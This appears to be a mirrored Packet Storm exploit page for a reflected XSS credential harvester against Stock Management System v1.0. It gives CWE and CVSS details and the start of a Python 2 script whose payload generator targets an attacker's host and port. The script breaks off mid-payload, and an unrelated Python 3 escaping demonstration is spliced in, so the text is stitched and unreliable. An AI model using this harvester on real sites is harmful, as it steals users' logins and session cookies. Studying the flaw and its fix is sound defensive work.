Stock Management System 1.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition





Published on August 5th, 2020



# Exploit Title: Stock Management System v1.0 – Cross-Site Scripting Credential Harvester (Login-Portal)
# Exploit Author: Bobby Cooke
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# Version: 1.0
# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') – Type 1: Reflected XSS
# CWE-523: Unprotected Transport of Credentials
# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
# CVSS Base Score: 6.4 | Impact Subscore: 4.7 | Exploitability Subscore: 1.6
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# Vulnerability Description:
# Reflected Cross-Site Scripting (XSS) vulnerability in the 'index.php' login-portal webpage of SourceCodester's
# Stock Management System v1.0 allows remote attackers to harvest login credentials and the session cookie when
# an unauthenticated victim clicks a malicious URL and enters credentials.

import socket,sys,urllib,re
from thread import *
from colorama import Fore, Back, Style

F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '

def urlEncode(javascript):
    return urllib.quote(javascript)

def genXssPayload(LHOST,LPORT):
    XSS_PAYLOAD = '/" method="post" id="loginForm">
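The advisory's payload is an attribute-context breakout: its leading `/"` closes the quoted attribute the login page reflects into, and the rest opens a new form element. The Python 3 snippet below is an added illustration, not part of the advisory or of the vendor's code; the form template is a constructed stand-in for the vendor's login page, and the snippet shows that escaping the reflected value in attribute context (the fix for CWE-79 here) leaves the payload inert, using an HTML parser to check what a browser would actually see.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for a login form whose action attribute reflects
# the request path; this is the pattern the advisory's payload breaks out of.
FORM_TEMPLATE = ('<form action="{action}" method="post">'
                 '<input name="username">'
                 '<input name="password" type="password"></form>')

# The breakout prefix from the advisory's payload: the quote closes the
# attribute and a new tag is opened right behind it.
BREAKOUT = '/" method="post" id="loginForm">'


def render_unsafe(reflected):
    """Vulnerable pattern: reflected value concatenated raw into the attribute."""
    return FORM_TEMPLATE.format(action=reflected)


def render_safe(reflected):
    """Fixed pattern: attribute-context escaping before interpolation."""
    return FORM_TEMPLATE.format(action=html.escape(reflected, quote=True))


class _Collector(HTMLParser):
    """Records every start tag with its attributes, as a browser would parse them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def form_actions(rendered):
    """Return the action attribute of every <form> element in the markup."""
    p = _Collector()
    p.feed(rendered)
    return [a.get("action") for t, a in p.tags if t == "form"]


def is_contained(rendered, reflected):
    """True when the reflected text stayed inside the single intended attribute."""
    actions = form_actions(rendered)
    return len(actions) == 1 and actions[0] == reflected
```

With the unsafe renderer the parsed form's action collapses to `/` and the attacker-controlled `method`/`id` attributes become part of the tag; with the safe renderer the whole breakout string survives as inert attribute text.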
